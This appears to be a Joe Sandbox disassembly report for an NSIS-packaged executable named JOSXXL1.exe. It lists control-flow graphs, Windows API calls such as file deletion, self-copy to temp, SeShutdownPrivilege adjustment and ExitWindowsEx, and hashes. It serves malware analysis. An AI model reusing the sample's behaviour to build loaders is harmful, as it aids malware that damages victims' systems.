lstrcpynW 4869->4906 4871 40370c OleUninitialize 4870->4871 4871->4633 4871->4634 4872->4871 4877 4064c6 2 API calls 4872->4877 4874 4059d9 4875 4059ec 4874->4875 4876 4059df 
lstrcatW 4874->4876 4879 405b83 2 API calls 4875->4879 4878 4059f2 4876->4878 4882 405af8 4877->4882 4880 405a02 lstrcatW 4878->4880 4881 4059f8 4878->4881 4879->4878 4883 405a0d lstrlenW FindFirstFileW 4880->4883 4881->4880 4881->4883 4882->4871 4884 405afc 4882->4884 4885 405ad3 4883->4885 4904 405a2f 4883->4904 4886 405b37 3 API calls 4884->4886 4885->4872 4887 405b02 4886->4887 4889 40592c 5 API calls 4887->4889 4888 405ab6 FindNextFileW 4892 405acc FindClose 4888->4892 4888->4904 4891 405b0e 4889->4891 4893 405b12 4891->4893 4894 405b28 4891->4894 4892->4885 4893->4871 4897 4052e2 25 API calls 4893->4897 4895 4052e2 25 API calls 4894->4895 4895->4871 4899 405b1f 4897->4899 4898 405974 62 API calls 4898->4904 4901 406024 38 API calls 4899->4901 4900 4052e2 25 API calls 4900->4888 4903 405b26 4901->4903 4902 4052e2 25 API calls 4902->4904 4903->4871 4904->4888 4904->4898 4904->4900 4904->4902 4905 406024 38 API calls 4904->4905 4907 406183 lstrcpynW 4904->4907 4908 40592c 4904->4908 4905->4904 4906->4874 4907->4904 4909 405d33 2 API calls 4908->4909 4910 405938 4909->4910 4911 405947 RemoveDirectoryW 4910->4911 4912 40594f DeleteFileW 4910->4912 4914 405959 4910->4914 4913 405955 4911->4913 4912->4913 4913->4914 4915 405965 SetFileAttributesW 4913->4915 4914->4904 4915->4914 4917 405f00 GetShortPathNameW 4916->4917 4918 405eda 4916->4918 4919 405f15 4917->4919 4920 40601f 4917->4920 4943 405d58 GetFileAttributesW CreateFileW 4918->4943 4919->4920 4922 405f1d wsprintfA 4919->4922 4920->4830 4924 4061a5 18 API calls 4922->4924 4923 405ee4 CloseHandle GetShortPathNameW 4923->4920 4925 405ef8 4923->4925 4926 405f45 4924->4926 4925->4917 4925->4920 4944 405d58 GetFileAttributesW CreateFileW 4926->4944 4928 405f52 4928->4920 4929 405f61 GetFileSize GlobalAlloc 4928->4929 4930 405f83 4929->4930 4931 406018 CloseHandle 4929->4931 4932 405ddb ReadFile 4930->4932 4931->4920 4933 405f8b 4932->4933 4933->4931 4945 405cbd lstrlenA 4933->4945 4936 405fa2 lstrcpyA 4939 405fc4 
4936->4939 4937 405fb6 4938 405cbd 4 API calls 4937->4938 4938->4939 4940 405ffb SetFilePointer 4939->4940 4941 405e0a WriteFile 4940->4941 4942 406011 GlobalFree 4941->4942 4942->4931 4943->4923 4944->4928 4946 405cfe lstrlenA 4945->4946 4947 405d06 4946->4947 4948 405cd7 lstrcmpiA 4946->4948 4947->4936 4947->4937 4948->4947 4949 405cf5 CharNextA 4948->4949 4949->4946 4950 401b37 4951 401b44 4950->4951 4952 401b88 4950->4952 4955 401bcd 4951->4955 4960 401b5b 4951->4960 4953 401bb2 GlobalAlloc 4952->4953 4954 401b8d 4952->4954 4956 4061a5 18 API calls 4953->4956 4964 402288 4954->4964 4971 406183 lstrcpynW 4954->4971 4957 4061a5 18 API calls 4955->4957 4955->4964 4956->4955 4959 402282 4957->4959 4965 4058c8 MessageBoxIndirectW 4959->4965 4969 406183 lstrcpynW 4960->4969 4962 401b9f GlobalFree 4962->4964 4963 401b6a 4970 406183 lstrcpynW 4963->4970 4965->4964 4967 401b79 4972 406183 lstrcpynW 4967->4972 4969->4963 4970->4967 4971->4962 4972->4964 5796 402537 5797 402562 5796->5797 5798 40254b 5796->5798 5799 402596 5797->5799 5800 402567 5797->5800 5801 402ba2 18 API calls 5798->5801 5803 402bbf 18 API calls 5799->5803 5802 402bbf 18 API calls 5800->5802 5807 402552 5801->5807 5804 40256e WideCharToMultiByte lstrlenA 5802->5804 5805 40259d lstrlenW 5803->5805 5804->5807 5805->5807 5806 4025e0 5807->5806 5809 405e39 5 API calls 5807->5809 5810 4025ca 5807->5810 5808 405e0a WriteFile 5808->5806 5809->5810 5810->5806 5810->5808 5811 404a38 5812 404a64 5811->5812 5813 404a48 5811->5813 5815 404a97 5812->5815 5816 404a6a SHGetPathFromIDListW 5812->5816 5822 4058ac GetDlgItemTextW 5813->5822 5818 404a81 SendMessageW 5816->5818 5819 404a7a 5816->5819 5817 404a55 SendMessageW 5817->5812 5818->5815 5821 40140b 2 API calls 5819->5821 5821->5818 5822->5817 5823 4014b8 5824 4014be 5823->5824 5825 401389 2 API calls 5824->5825 5826 4014c6 5825->5826 4987 4015b9 4988 402bbf 18 API calls 4987->4988 4989 4015c0 4988->4989 4990 405be2 4 API calls 4989->4990 5000 4015c9 4990->5000 
4991 401629 4993 40165b 4991->4993 4994 40162e 4991->4994 4992 405b64 CharNextW 4992->5000 4996 401423 25 API calls 4993->4996 4995 401423 25 API calls 4994->4995 4997 401635 4995->4997 5004 401653 4996->5004 5006 406183 lstrcpynW 4997->5006 4998 40582e 2 API calls 4998->5000 5000->4991 5000->4992 5000->4998 5001 40584b 5 API calls 5000->5001 5003 40160f GetFileAttributesW 5000->5003 5005 4057b1 4 API calls 5000->5005 5001->5000 5002 401642 SetCurrentDirectoryW 5002->5004 5003->5000 5005->5000 5006->5002 5834 40293b 5835 402ba2 18 API calls 5834->5835 5836 402941 5835->5836 5837 402964 5836->5837 5838 40297d 5836->5838 5845 40281e 5836->5845 5841 402969 5837->5841 5842 40297a 5837->5842 5839 402993 5838->5839 5840 402987 5838->5840 5844 4061a5 18 API calls 5839->5844 5843 402ba2 18 API calls 5840->5843 5848 406183 lstrcpynW 5841->5848 5849 4060ca wsprintfW 5842->5849 5843->5845 5844->5845 5848->5845 5849->5845 5850 10002a7f 5851 10002a97 5850->5851 5852 1000158f 2 API calls 5851->5852 5853 10002ab2 5852->5853

Control-flow Graph

[Figure: control-flow graph; legend: Executed / Not Executed]
APIs
• SetErrorMode.KERNELBASE ref: 004033D8
• GetVersion.KERNEL32 ref: 004033DE
• #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040342E
• OleInitialize.OLE32(00000000), ref: 00403435
• SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403451
• GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 00403466
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\JOSXXL1.exe",00000000), ref: 00403479
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\JOSXXL1.exe",00000020), ref: 004034A0
  • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
  • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035DB
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035EC
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F8
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040360C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403614
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403625
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040362D
• DeleteFileW.KERNELBASE(1033), ref: 00403641
  • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
• OleUninitialize.OLE32(?), ref: 0040370C
• ExitProcess.KERNEL32 ref: 0040372E
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\JOSXXL1.exe",00000000,?), ref: 00403741
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\JOSXXL1.exe",00000000,?), ref: 00403750
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\JOSXXL1.exe",00000000,?), ref: 0040375B
                                                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\JOSXXL1.exe",00000000,?), ref: 00403767
                                                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403783
                                                                                                        • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 004037DD
                                                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\JOSXXL1.exe,00420F08,00000001), ref: 004037F1
                                                                                                        • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 0040381E
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040384D
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403854
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403869
                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0040388C
                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004038B1
                                                                                                        • ExitProcess.KERNEL32 ref: 004038D4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\indvandrings\attraavrdig$C:\Users\user\AppData\Local\indvandrings\attraavrdig$C:\Users\user\Desktop$C:\Users\user\Desktop\JOSXXL1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                                                                                        • API String ID: 3586999533-2604846293
                                                                                                        • Opcode ID: 37fd72db2f3c779e54c66a831dce751320d167363bccd50d4a6240ace931b804
                                                                                                        • Instruction ID: 382b60f40ca78a79eaa77c6fd6579f97e3273799caf5780a05f3f86dc88dff68
                                                                                                        • Opcode Fuzzy Hash: 37fd72db2f3c779e54c66a831dce751320d167363bccd50d4a6240ace931b804
                                                                                                        • Instruction Fuzzy Hash: 1DD11771200300BBD7207F659D09A2B3EADEB4070AF15843FF885B62D2DB7D9956876E

                                                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040547F
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040548E
                                                                                                        • GetClientRect.USER32(?,?), ref: 004054CB
                                                                                                        • GetSystemMetrics.USER32(00000002), ref: 004054D2
                                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F3
                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405504
                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405517
                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405525
                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405538
                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555A
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040556E
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040558F
                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559F
                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B8
                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C4
                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040549D
                                                                                                          • Part of subcall function 0040427C: SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004055E1
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000053B5,00000000), ref: 004055EF
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004055F6
                                                                                                        • ShowWindow.USER32(00000000), ref: 0040561A
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040561F
                                                                                                        • ShowWindow.USER32(00000008), ref: 00405669
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040569D
                                                                                                        • CreatePopupMenu.USER32 ref: 004056AE
                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C2
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004056E2
                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FB
                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405733
                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405743
                                                                                                        • EmptyClipboard.USER32 ref: 00405749
                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405755
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0040575F
                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405793
                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 0040579E
                                                                                                        • CloseClipboard.USER32 ref: 004057A4
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                        • String ID: H7B$\d${
                                                                                                        • API String ID: 590372296-124952274
                                                                                                        • Opcode ID: b289c1c8cef76fdb5c73aa669ad90c431715ad63f7106bdf0767040ca558229c
                                                                                                        • Instruction ID: 2c7cb92300b087b9ae130e103e133312d6144c84674811722de124f1f1f34f09
                                                                                                        • Opcode Fuzzy Hash: b289c1c8cef76fdb5c73aa669ad90c431715ad63f7106bdf0767040ca558229c
                                                                                                        • Instruction Fuzzy Hash: 16B13770900608FFDF119F60DD899AE7B79FB08354F40847AFA45A62A0CB758E52DF68

                                                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,?,00405319,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 00406268
                                                                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004062E6
                                                                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004062F9
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406335
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406343
                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0040634E
                                                                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406372
                                                                                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,?,00405319,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 004063CC
                                                                                                        Similarity
                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                        • API String ID: 900638850-2531536127
                                                                                                        • Opcode ID: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                        • Instruction ID: 0f73e779dd6c4db66e797802c36dad016b528f10de9f6072c808280cb7245e7c
                                                                                                        • Opcode Fuzzy Hash: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                        • Instruction Fuzzy Hash: 9361F271A00105EBDB209F25CD41AAE37A5AF50314F16807FFD46BA2D0D73D89A2CB9D

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 496 405974-40599a call 405c3f 499 4059b3-4059ba 496->499 500 40599c-4059ae DeleteFileW 496->500 502 4059bc-4059be 499->502 503 4059cd-4059dd call 406183 499->503 501 405b30-405b34 500->501 504 4059c4-4059c7 502->504 505 405ade-405ae3 502->505 511 4059ec-4059ed call 405b83 503->511 512 4059df-4059ea lstrcatW 503->512 504->503 504->505 505->501 508 405ae5-405ae8 505->508 509 405af2-405afa call 4064c6 508->509 510 405aea-405af0 508->510 509->501 520 405afc-405b10 call 405b37 call 40592c 509->520 510->501 514 4059f2-4059f6 511->514 512->514 516 405a02-405a08 lstrcatW 514->516 517 4059f8-405a00 514->517 519 405a0d-405a29 lstrlenW FindFirstFileW 516->519 517->516 517->519 521 405ad3-405ad7 519->521 522 405a2f-405a37 519->522 536 405b12-405b15 520->536 537 405b28-405b2b call 4052e2 520->537 521->505 527 405ad9 521->527 524 405a57-405a6b call 406183 522->524 525 405a39-405a41 522->525 538 405a82-405a8d call 40592c 524->538 539 405a6d-405a75 524->539 528 405a43-405a4b 525->528 529 405ab6-405ac6 FindNextFileW 525->529 527->505 528->524 532 405a4d-405a55 528->532 529->522 535 405acc-405acd FindClose 529->535 532->524 532->529 535->521 536->510 541 405b17-405b26 call 4052e2 call 406024 536->541 537->501 547 405aae-405ab1 call 4052e2 538->547 548 405a8f-405a92 538->548 539->529 542 405a77-405a80 call 405974 539->542 541->501 542->529 547->529 551 405a94-405aa4 call 4052e2 call 406024 548->551 552 405aa6-405aac 548->552 551->529 552->529
                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNELBASE(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 0040599D
                                                                                                        • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 004059E5
                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405A08
                                                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405A0E
                                                                                                        • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405A1E
                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,0000002E), ref: 00405ABE
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405ACD
                                                                                                        Strings
                                                                                                        • "C:\Users\user\Desktop\JOSXXL1.exe", xrefs: 0040597D
                                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405A5E
                                                                                                        • \*.*, xrefs: 004059DF
                                                                                                        • PWB, xrefs: 004059CD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$Error writing temporary file. Make sure your temp folder is valid.$PWB$\*.*
                                                                                                        • API String ID: 2035342205-1255635639
                                                                                                        • Opcode ID: b88ea9f3819749435121edc00aa0cbde52c08bbffeef75bbb38eec1dc687fba1
                                                                                                        • Instruction ID: d49c34b76256c1d29f4337415f4183e275b3e80d30968624801757685f99445f
                                                                                                        • Opcode Fuzzy Hash: b88ea9f3819749435121edc00aa0cbde52c08bbffeef75bbb38eec1dc687fba1
                                                                                                        • Instruction Fuzzy Hash: E041B130A00A14EADB21AB618D89BAF7778DF41764F20427FF805B51D2D77C5982CE6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
                                                                                                        • Instruction ID: 5555e847f210990d4306c473702a26b4278c0affe79ec1256b97cb42bd71170f
                                                                                                        • Opcode Fuzzy Hash: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
                                                                                                        • Instruction Fuzzy Hash: 60F17671D04229CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7785A86CF45
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(74DF3420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0), ref: 004064D1
                                                                                                        • FindClose.KERNEL32(00000000), ref: 004064DD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 2295610775-0
                                                                                                        • Opcode ID: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                        • Instruction ID: 6f39d47423a9e3911ec825e8889a8cd4e4dbe9a09c05077791626206cca478a1
                                                                                                        • Opcode Fuzzy Hash: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                        • Instruction Fuzzy Hash: FED012715151209BC2901B787F0C85B7A989F553317128E36F46AF22E0C738CC67869C

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 186 403d6f-403d81 187 403ec2-403ed1 186->187 188 403d87-403d8d 186->188 190 403f20-403f35 187->190 191 403ed3-403f1b GetDlgItem * 2 call 404247 SetClassLongW call 40140b 187->191 188->187 189 403d93-403d9c 188->189 195 403db1-403db4 189->195 196 403d9e-403dab SetWindowPos 189->196 193 403f75-403f7a call 404293 190->193 194 403f37-403f3a 190->194 191->190 208 403f7f-403f9a 193->208 200 403f3c-403f47 call 401389 194->200 201 403f6d-403f6f 194->201 197 403db6-403dc8 ShowWindow 195->197 198 403dce-403dd4 195->198 196->195 197->198 203 403df0-403df3 198->203 204 403dd6-403deb DestroyWindow 198->204 200->201 221 403f49-403f68 SendMessageW 200->221 201->193 207 404214 201->207 212 403df5-403e01 SetWindowLongW 203->212 213 403e06-403e0c 203->213 210 4041f1-4041f7 204->210 209 404216-40421d 207->209 215 403fa3-403fa9 208->215 216 403f9c-403f9e call 40140b 208->216 210->207 222 4041f9-4041ff 210->222 212->209 219 403e12-403e23 GetDlgItem 213->219 220 403eaf-403ebd call 4042ae 213->220 217 4041d2-4041eb DestroyWindow EndDialog 215->217 218 403faf-403fba 215->218 216->215 217->210 218->217 224 403fc0-40400d call 4061a5 call 404247 * 3 GetDlgItem 218->224 225 403e42-403e45 219->225 226 403e25-403e3c SendMessageW IsWindowEnabled 219->226 220->209 221->209 222->207 228 404201-40420a ShowWindow 222->228 256 404017-404053 ShowWindow KiUserCallbackDispatcher call 404269 EnableWindow 224->256 257 40400f-404014 224->257 230 403e47-403e48 225->230 231 403e4a-403e4d 225->231 226->207 226->225 228->207 234 403e78-403e7d call 404220 230->234 235 403e5b-403e60 231->235 236 403e4f-403e55 231->236 234->220 239 403e96-403ea9 SendMessageW 235->239 241 403e62-403e68 235->241 236->239 240 403e57-403e59 236->240 239->220 240->234 244 403e6a-403e70 call 40140b 241->244 245 403e7f-403e88 call 40140b 241->245 252 403e76 244->252 245->220 254 403e8a-403e94 245->254 252->234 
254->252 260 404055-404056 256->260 261 404058 256->261 257->256 262 40405a-404088 GetSystemMenu EnableMenuItem SendMessageW 260->262 261->262 263 40408a-40409b SendMessageW 262->263 264 40409d 262->264 265 4040a3-4040e1 call 40427c call 406183 lstrlenW call 4061a5 SetWindowTextW call 401389 263->265 264->265 265->208 274 4040e7-4040e9 265->274 274->208 275 4040ef-4040f3 274->275 276 404112-404126 DestroyWindow 275->276 277 4040f5-4040fb 275->277 276->210 279 40412c-404159 CreateDialogParamW 276->279 277->207 278 404101-404107 277->278 278->208 280 40410d 278->280 279->210 281 40415f-4041b6 call 404247 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->207 281->207 286 4041b8-4041cb ShowWindow call 404293 281->286 288 4041d0 286->288 288->210
                                                                                                        APIs
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DAB
                                                                                                        • ShowWindow.USER32(?), ref: 00403DC8
                                                                                                        • DestroyWindow.USER32 ref: 00403DDC
                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF8
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00403E19
                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E2D
                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403E34
                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403EE2
                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403EEC
                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403F06
                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F57
                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403FFD
                                                                                                        • ShowWindow.USER32(00000000,?), ref: 0040401E
                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404030
                                                                                                        • EnableWindow.USER32(?,?), ref: 0040404B
                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404061
                                                                                                        • EnableMenuItem.USER32(00000000), ref: 00404068
                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404080
                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404093
                                                                                                        • lstrlenW.KERNEL32(00423748,?,00423748,00429260), ref: 004040BC
                                                                                                        • SetWindowTextW.USER32(?,00423748), ref: 004040D0
                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404204
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                        • String ID: H7B$\d
                                                                                                        • API String ID: 3282139019-3853218712
                                                                                                        • Opcode ID: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                        • Instruction ID: 25c141fc174ea51021f963d75397c5770897fb54822066ed0df1b6b59a0401a8
                                                                                                        • Opcode Fuzzy Hash: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                        • Instruction Fuzzy Hash: EFC1CFB1644200FBDB216F61EE84D2B7B78EB98745F40097EF641B51F0CB3998529B2E

                                                                                                        Control-flow Graph

